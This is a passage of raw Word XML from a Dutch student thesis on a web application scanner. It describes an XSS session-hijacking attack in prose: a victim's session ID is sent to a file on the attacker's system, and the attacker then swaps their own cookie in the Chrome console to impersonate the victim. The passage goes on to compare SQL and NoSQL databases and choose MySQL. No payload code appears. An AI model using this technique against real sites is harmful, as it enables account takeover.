    </w:p>
    <w:p w14:paraId="6A5548E0" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:t>Voor de werking van deze XSS-aanval is het nodig dat de gebruiker is ingelogd, want anders is er geen sessie id gegenereerd en dus ook geen kwetsbaarheid om te exploiteren. Dit betekend dat de website enkel kwetsbaar wordt als er gebruikers ingelogd zijn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D9BA2D" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:t xml:space="preserve">De exploitatie kan op elke website gebeuren waar gebruikerscontent gepubliceerd kan worden. Een ander manier is om de selectie van slachtoffers een email te sturen met de link, het liefst verbogen in een klikbare afbeelding zoals een advertentie of een uitnodigende hyperlink. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC83368" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253267968" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5E02175A" wp14:editId="1146B7FB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>23072</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>75142</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2379133" cy="762000"/>
                <wp:effectExtent l="19050" t="0" r="40640" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="837"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C1109" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CF3AE8">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2175A"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267" type="#_x0000_t54" style="position:absolute;left:0;text-align:left;margin-left:1.8pt;margin-top:5.9pt;width:187.35pt;height:60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" adj=",18000" fillcolor="#4472c4 [3204]" strokecolor="#1f3763 [1604]" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="2F3C1109" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CF3AE8">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3268992" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="610CDB51" wp14:editId="4546A90A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2757594</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>286385</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3817620" cy="512445"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="8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7A1ADEF" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="006B40B9" w:rsidRDefault="002A05E5" w:rsidP="00CF3AE8">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CDB51" id="_x0000_s1268" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:217.15pt;margin-top:22.55pt;width:300.6pt;height:40.35pt;z-index:-2500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l+2YRScCAAAmBAAADgAAAAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0Rv&#10;Yy54bWxQSwECLQAUAAYACAAAACEAvx5CSN8AAAALAQAADwAAAAAAAAAAAAAAAAB/BAAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAIsFAAAAAA==&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w14:paraId="27A1ADEF" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="006B40B9" w:rsidRDefault="002A05E5" w:rsidP="00CF3AE8">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E68D535" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253270016" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="42CFACB7" wp14:editId="3421B848">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2351405</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>91440</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="389467" cy="262467"/>
                <wp:effectExtent l="0" t="19050" r="29845" b="42545"/>
                <wp:wrapNone/>
                <wp:docPr id="839"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F790D0"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32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" adj="14322" fillcolor="#4472c4 [3204]" strokecolor="#1f3763 [1604]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C7FD1C" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRPr="00D22C48" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8"/>
    <w:p w14:paraId="2146177B" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E01CD">
        <w:rPr>
          <w:b/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>FIGUUR 3.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FF8A46" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:t xml:space="preserve">Zodra de niets vermoedende gebruiker erop klikt wordt de sessie ID weggeschreven naar een tekstbestand op het systeem van de hacker. De verzamelde sessie ID’s kan de hacker vervolgens gebruiken om toegang te krijgen tot de accounts van de slachtoffers. De hacker doet dit door zijn eigen sessie ID te veranderen in die van zijn slachtoffer. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6868F0" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRPr="00D47336" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47336">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Cookies veranderen in Chrome</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268E79EF" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253271040" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0CA766CB" wp14:editId="0D1F3BE9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>199390</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3919855" cy="736600"/>
            <wp:effectExtent l="25400" t="0" r="42545" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="847" name="Diagram 8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14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t>Met de Console van Chrome kun je in Javascript de cookies veranderen van waarden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E888E3" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRPr="00F12D3B" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r w:rsidRPr="00F12D3B">
        <w:t>Javascript commando</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD835BE" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRPr="00F12D3B" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="253272064" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="024A1C09" wp14:editId="70223632">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>left</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>8255</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4275455" cy="405765"/>
                <wp:effectExtent l="0" t="0" r="10795" b="13335"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="8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F168C55" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CF3AE8">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A1C09" id="_x0000_s1269" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:.65pt;width:336.65pt;height:31.95pt;z-index:25327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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w14:paraId="3F168C55" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CF3AE8">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1A92AC97" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRPr="00F12D3B" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48E1993F" w14:textId="7FE04C7A" w:rsidR="00DE405E" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:t xml:space="preserve">Bij het uitvoeren van deze commando kan de hacker zich nu </w:t>
      </w:r>
      <w:r w:rsidRPr="008E50BA">
        <w:t>proble</w:t>
      </w:r>
      <w:r>
        <w:t>emloos voordoen als andere gebruikers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE2E69F" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRDefault="00DE405E">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B2D15A" w14:textId="6C697127" w:rsidR="001958CD" w:rsidRDefault="001958CD" w:rsidP="000E3238">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00F9607E">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="44"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253282304" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="096E84E4" wp14:editId="6F35EC12">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-905971</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-596961</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="854" name="Rectangle 85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263E5" id="Rectangle 854" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.35pt;margin-top:-46.95pt;width:25pt;height:1031.7pt;z-index:-2500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U2p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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E59BFEE" w14:textId="63206256" w:rsidR="00E31BB5" w:rsidRDefault="00DF72C7" w:rsidP="000E3238">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00F9607E">
        <w:t>SQL onderzoek</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433637B9" w14:textId="37F9148E" w:rsidR="00DE405E" w:rsidRPr="00A71F83" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:r w:rsidRPr="001A1584">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Voordelen van een SQL database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12049E3C" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:r>
        <w:t>SQL is een ANSI</w:t>
      </w:r>
      <w:r w:rsidRPr="004940EC">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>/ISO</w:t>
      </w:r>
      <w:r w:rsidRPr="004940EC">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> standaardtaal voor relationele DBM systemen. Omdat het gestandaardiseerd is kan het bijna met elke software systeem geïntegreerd worden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56371819" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:r>
        <w:t xml:space="preserve">Een sterke punt van SQL databases is het gebruik van SQL als operatieve taal. Met deze taal kun je query’s uitvoeren waarmee data opgehaald kan worden, gewijzigd, geüpdatet en verwijderd. Het is een declaratieve taal wat het schrijven van query’s makkelijk maakt. Bij declaratieve talen schrijft je wat er moet gebeuren i.p.v. hoe het moet gebeuren. Dit maakt het een krachtige taal met een lage leercurve. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA448AE" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:r>
        <w:t>Een ander sterk punt van SQL databases is dat zij gebruik maken van gestructureerde schema waarmee op een georganiseerde manier data kan worden opgeslagen. Bij het maken van een schema wordt er eerst wat voorbereidend werkt gedaan, zoals het identificeren van entiteiten en het normaliseren daarvan, dit wordt gedaan om redundantie binnen het database structuur te verminderen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B850DA2" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:r>
        <w:t xml:space="preserve">Een schema bestaat zoals in figuur 3.5.2 uit tabellen, deze zijn met elkaar verbonden door relaties wat een ander voordeel is. Database engineers kunnen relaties tussen tabellen definiëren om zo afhankelijkheid tussen de tabellen te creëren. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A68D233" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRPr="001311F0" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001311F0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Relaties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1254B9E9" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Één op één relatie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576CC8C7" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Één op veel relatie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035F6FC9" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Veel op veel relatie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F501E4C" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:r>
        <w:t xml:space="preserve">Zoals in figuur 3.5.2 is aangegeven is tabel Comment afhankelijk van tabel Blog met een één op veel relatie. Een ander krachtige functie van SQL is het gebruik van JOINS. JOINS worden gebruikt bij het selecteren van data uit meerdere tabellen. SQL databases maken gebruik van Constraints (beperkingen) binnen het systeem. Contraints zijn regels waar een tabel zich aan moet houden zo kan het de invoer van specifieke data types limiteren of ervoor zorgen dat velden niet leeg mogen zijn. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA75739" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRPr="00923179" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00923179">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Aantal </w:t>
      </w:r>
      <w:r w:rsidRPr="00923179">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Contrains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CA0B3D" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRPr="00923179" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00923179">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>NOT  NULL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1DDB5C" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRPr="00923179" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00923179">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>UNIQUE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077514BE" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRPr="00815674" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00923179">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">CHECK </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A978F8" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRPr="00714FFE" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Samengevat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D92818F" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:r>
        <w:t xml:space="preserve">SQL databases bieden de middelen aan, om gestructureerde databases te ontwerpen en bouwen en waar, op een georganiseerde manier data in kan worden opgeslagen. SQL databases gebruik je wanneer het een eis is van het systeem dat data op een gestructureerde en georganiseerde manier moet worden opgeslagen en wanneer het systeem de invoer van data limiteert met Constrains (beperkingen). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08811F06" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AE53EC" w14:textId="3D06715C" w:rsidR="001958CD" w:rsidRDefault="001958CD" w:rsidP="00DE405E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00537717">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253280256" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6C2015CE" wp14:editId="162AB794">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-895985</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-598901</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="852" name="Rectangle 8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B5BB0" id="Rectangle 852" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.55pt;margin-top:-47.1pt;width:25pt;height:1031.7pt;z-index:-2500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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D62F11" w14:textId="77777777" w:rsidR="001958CD" w:rsidRDefault="001958CD" w:rsidP="00DE405E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C8FD503" w14:textId="35A95AA0" w:rsidR="00DE405E" w:rsidRPr="00CC4DB8" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC4DB8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Voordelen van een NO-SQL database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EBB7E6" w14:textId="08F20F81" w:rsidR="00DE405E" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:r>
        <w:t xml:space="preserve">Wanneer er een grote hoeveelheid data aanwezig is en het is niet mogelijk om een ervoor gedefinieerde structuur te ontwerpen dan is het niet verstandig om het in een relationele database op te slaan. NOSQL biedt hier een oplossing voor, het is geschikt voor web applicaties met grootschalige databases die geen gebruik maken van relationele schema en die zeer schaalbaar moeten zijn. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FAA3EF" w14:textId="1B1F8917" w:rsidR="00DE405E" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:r>
        <w:t xml:space="preserve">NOSQL databases zijn makkelijker te beheren vanwege hun simpele data model structuur, dit verlaagd de administratie en configuratie eisen van een DBMS en dat verlaagd weer de onderhoud kosten. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776FD632" w14:textId="6D8EDF0A" w:rsidR="00DE405E" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:r>
        <w:t xml:space="preserve">NOSQL databases hebben veel minder restricties dan rationele databases. Door de key-value structuur dat in documenten worden opgeslagen in de database, zorgt ervoor dat web applicaties virtueel met elke data structuur kunnen werken. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18793C38" w14:textId="39D2B298" w:rsidR="00DE405E" w:rsidRPr="00CC4DB8" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Samengevat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E07F427" w14:textId="7A9A3113" w:rsidR="00DE405E" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:r>
        <w:t xml:space="preserve">Als een systeem schaalbaar moet zijn, een groot hoeveelheid data moet verwerken waarvan de structuur niet vooraf gedefinieerd kan worden en het onderhouden van een RDBMS financieel niet mogelijk is dan biedt NOSQL database een geschikte oplossing voor het probleem.    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122E64C5" w14:textId="5A121604" w:rsidR="00DE405E" w:rsidRPr="00461740" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00461740">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Conclusie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DCA2ED" w14:textId="09B9F36F" w:rsidR="00DE405E" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:r>
        <w:t xml:space="preserve">Met betrekking tot het projectcontext kan ik stellen dat NOSQL niet geschikt is voor het software systeem die ik ga ontwikkelen voor mijn afstudeerproject. De systeemeisen van de Webapplicatie scanner met betrekking tot de database komen niet overeen met wat een NOSQL kenmerkt, op een aantal zaken na. De database heeft een vooraf gedefinieerde data structuur, het maakt gebruik van integriteitsregels en entiteit relaties. De zaken die wel overeenkomen zijn: grote hoeveelheid data dat verwerkt moet worden en, vanwege de modulariteit van het systeem is de schaalbaarheid van een NOSQL database ook een belangrijk kenmerk.    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63630AE7" w14:textId="15688EAA" w:rsidR="00DE405E" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00394FB6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DBMS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A63195" w14:textId="03BF9984" w:rsidR="00DE405E" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:r>
        <w:t>In de voorgaande deel heb ik mijn keuze laten vallen op de relationele DBMS. Wat er nu overblijft voor dit deelonderzoek is het vinden van een geschikte DBMS. Ik zal enkel kijken naar open source database systemen dus die van Microsoft en IBM vallen al af. Dit zijn tevens ook de twee grootste leveranciers van DBMS op Oracle na die naast een commerciële versie, ook een open source versie aanbiedt (MySQL). Ik heb in het verleden alleen met één RDBMS gewerkt, en dat is MySQL. Deze heeft twee versies de web versie phpMyAdmin en voor Desktop MySQL Workbench. Deze is het meest gangbare en meest populaire als het gaat om open source database applicaties. MySQL is voor grootschalige database servers ideaal en heeft veel features en een goed support community. Het heeft een lage leercurve en is relatief makkelijk te implementeren in een ontwikkelomgeving zoals Laravel. Er zijn een aantal andere databasemanagementsystemen die open source zijn maar, in dit geval hoef ik niet verder te zoeken omdat dit al een geschikte optie is voor mijn Webapplicatie scanner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C91006" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRPr="001A1A4B" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006176AD">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Database afhankelijkheid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EA3AD8" w14:textId="0D6217A9" w:rsidR="00B95B79" w:rsidRPr="00F241F6" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">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sectPr w:rsidR="00B95B79" w:rsidRPr="00F241F6" w:rsidSect="001958CD">
      <w:headerReference w:type="default" r:id="rId156"/>
      <w:headerReference w:type="first" r:id="rId157"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="0" w:right="1418" w:bottom="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64BDF" w14:textId="77777777" w:rsidR="008654FC" w:rsidRDefault="008654FC" w:rsidP="004B0A6F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3CD78B13" w14:textId="77777777" w:rsidR="008654FC" w:rsidRDefault="008654FC"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3D8A" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5"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28B">
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
        <w:noProof/>
      </w:rPr>
      <w:t>81</w:t>
